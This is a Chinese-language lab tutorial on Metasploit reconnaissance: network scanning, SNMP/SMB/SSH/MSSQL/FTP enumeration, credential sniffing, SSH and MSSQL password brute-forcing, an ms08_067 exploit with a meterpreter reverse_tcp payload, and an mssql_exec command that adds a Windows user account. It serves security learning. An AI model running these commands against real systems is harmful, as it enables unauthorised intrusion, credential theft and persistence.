前言
本节学习信息收集
1、简介
信息收集的模块都在 auxiliary/scanner/ 之下
service postgresql start
msfconsole
msf > use auxiliary/scanner/ [TAB] #查看所有scanner
地址的使用方式
192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24
也可以编写地址列表:file:/root/h.txt
2、db_nmap
跟 nmap 用法一样,结果存放在 msf 的数据库中
msf > db_nmap -sV 192.168.1.0/24
3、主机发现扫描
msf > search arp
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(scanner/discovery/arp_sweep) > show options
msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20 #线程数
msf auxiliary(scanner/discovery/arp_sweep) > run
#跟上面nmap扫描结果一样
4、端口扫描
msf > search portscan
msf > use auxiliary/scanner/portscan/syn #选择syn扫描
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
msf auxiliary(scanner/portscan/syn) > set PORTS 80
msf auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/portscan/syn) > set THREADS 50
msf auxiliary(scanner/portscan/syn) > run
5、僵尸扫描
查找 ipidseq 主机(查找僵尸机)
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(scanner/ip/ipidseq) > show options
msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
msf auxiliary(scanner/ip/ipidseq) > run
也可以用nmap
msf > db_nmap -PN -sI 192.168.1.110
6、UDP 扫描
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > show options
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_sweep) > run
这两个模块的用法有点不同
msf > use auxiliary/scanner/discovery/udp_probe
msf auxiliary(scanner/discovery/udp_probe) > show options
msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_probe) > set CHOST 192.168.1.111
msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
msf auxiliary(scanner/discovery/udp_probe) > run
7、密码嗅探
被动信息收集
支持从 pcap 抓包文件中提取密码
功能类似于 dsniff
msf > search sniffer
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(sniffer/psnuffle) > show options
msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
msf auxiliary(sniffer/psnuffle) > run
#也可以从pcap读取
msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
msf auxiliary(sniffer/psnuffle) > jobs
msf auxiliary(sniffer/psnuffle) > kill 0 #把之前的kill
msf auxiliary(sniffer/psnuffle) > run
8、SNMP扫描
对linux
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_login) > run
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_enum) > run
对windows
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > show options
msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumusers) > run
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(scanner/snmp/snmp_enumshares) > show options
msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumshares) > run
9、SMB扫描
#版本扫描
msf > search smb
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.122, 192.168.1.126
msf auxiliary(scanner/smb/smb_version) > run
msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator
msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_version) > run
#扫描命令管道。判断 SMB 服务类型(账号、密码)
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options
msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/pipe_auditor) > run
msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
msf auxiliary(scanner/smb/pipe_auditor) > run
#SMB 共享账号(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(scanner/smb/smb_enumshares) > show options
msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumshares) > run
msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumshares) > run
#SMB 用户枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(scanner/smb/smb_enumusers) > show options
msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumusers) > run
#SID 枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > show options
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_lookupsid) > run
10、SSH扫描
#SSH 版本扫描
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_version) > run
#SSH 密码爆破
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt #这是个现成的密码字典
msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false
msf auxiliary(scanner/ssh/ssh_login) > run
#SSH 公钥登录
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
11、获取 windows 缺少的补丁
基于已经取得的 session 进行检测
若遇到报错:known bug in WMI query, try migrating to another process
迁移到另一个进程再次进行尝试
msf > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set SESSION 4
msf post(windows/gather/enum_patches) > show advanced
msf post(windows/gather/enum_patches) > set VERBOSE yes
msf post(windows/gather/enum_patches) > run
#ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.126
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > run
12、mssql 扫描
mssql 扫描端口
默认端口:TCP 1422(动态端口)/ UDP 1434 (查询 TCP 端口号)
#尝试ping,确定端口
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_ping) > run
#爆破 mssql 密码
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_login) > set username Administrator
msf auxiliary(scanner/mssql/mssql_login) > set password ... #选择一个密码字典
msf auxiliary(scanner/mssql/mssql_login) > run
#远程执行代码(获取数据库权限之后)
msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.1.114 #自己的kali
msf auxiliary(admin/mssql/mssql_exec) > set username Administrator
msf auxiliary(admin/mssql/mssql_exec) > set password ... #这里是破解出来的密码
msf auxiliary(admin/mssql/mssql_exec) > set CMD net user user1 pass123 /ADD #执行代码,在数据库里面加一个账号
13、FTP 扫描
#查询版本信息
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/ftp_version) > run
#是否允许匿名登录
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/anonymous) > run
#暴力破解
msf > use auxiliary/scanner/ftp/ftp_login
结语
可以发现
用msf进行信息收集的手段非常丰富
当然其中许多效果和原理都与之前学的类似